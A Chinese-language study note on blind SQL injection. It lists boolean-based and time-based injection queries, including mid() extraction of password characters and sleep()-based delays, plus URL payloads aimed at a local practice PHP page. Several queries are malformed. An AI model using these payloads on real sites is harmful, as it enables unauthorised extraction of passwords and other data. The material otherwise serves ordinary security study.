Sql注入(盲注)

学习笔记—Sql注入(盲注)

一、盲注实践：
select * from users where (id = 1) and 1<(select count() xxx) – and pid > 100;


select * from users where (id = 1) and (1<(select count() xxx)); – and pid > 100;

select * from users where (id = 1) and 1<(select count() xss); – and pid > 100;

select * from users where (id = 1) and 1=(select count() xss); – and pid > 100;

select * from users where (id = 1) and 1<=(select count() xss); – and pid > 100;

select * from users where (id = 1) and 1<=(select count() region); – and pid > 100;

select * from users where (id = 1) and 1>=(select count() xxx); – and pid > 100;

select * from users where (id = 1) and 1>=(select count() region); – and pid > 100;

select count() from site;

select * from users where (id = 1) and 6<(select count() site); – and pid > 100;

二、盲注函数实践：
desc site;

select * from users where (id = 1) and 1<(select count(id) from site); – and pid > 100;

select * from users where (id = 1) and 1<(select count(id) from users);

select * from users where (id = 1) and ‘2’=mid((select pass from users limit 1),1,1);

select * from users where (id = 1) and ‘1’=mid((select pass from users limit 1),1,1);

三、盲注实战：
select sleep(7);

select * from users where (id = 1) and 0=if(1<=(select count() users),sleep(3),2);

select * from users where (id = 1) and 0=if(1<(select count() from users),sleep(3),2);

select * from users where (id = 1) and 0=if(1<(select count() from users),sleep(7),2);

select * from users where (id = 1) and 0=if(0<>(select count() from users),sleep(7),2);

select * from users where (id = 1) and 0=if(15<>(select count() from users),sleep(7),2);

四、时间注入web

http://127.0.0.1/7-27/index.php
?id=1) and 0=if(0<>(select count() from users),sleep(5),2) – s

http://127.0.0.1/7-27/index.php
?id=1) and 0=if(0<>(select count(*) from users),sleep(7),2) --+

了解更多请关注下列公众号：